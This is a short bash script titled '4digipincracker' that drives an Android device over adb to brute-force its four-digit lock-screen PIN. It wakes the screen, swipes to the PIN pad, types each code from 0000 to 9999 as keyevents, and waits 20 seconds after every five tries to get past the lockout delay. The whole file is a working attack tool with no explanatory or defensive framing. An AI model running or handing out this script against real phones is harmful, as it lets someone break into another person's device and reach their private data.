#!/usr/bin/env bash
# 4digipincracker


echo -e "\e[1;32mPAYLOAD STARTED"
adb shell input keyevent 82
adb shell input swipe 407 1211 378 85


echo -e "\e[1;34m BRUTE FORCING"
for i in {0000..9999}; do

    
    echo -e "\e[1;31m  TRYING $i"	
    for (( j=0; j<${#i}; j++ )); do
        adb shell input keyevent $((`echo ${i:$j:1}`+7))
    done

    adb shell input keyevent 66
    
    if ! (( `expr $i + 1` % 5 )); then
        adb shell input keyevent 66
        sleep 20
        adb shell input keyevent 82
        adb shell input swipe 407 1211 378 85
    fi
done
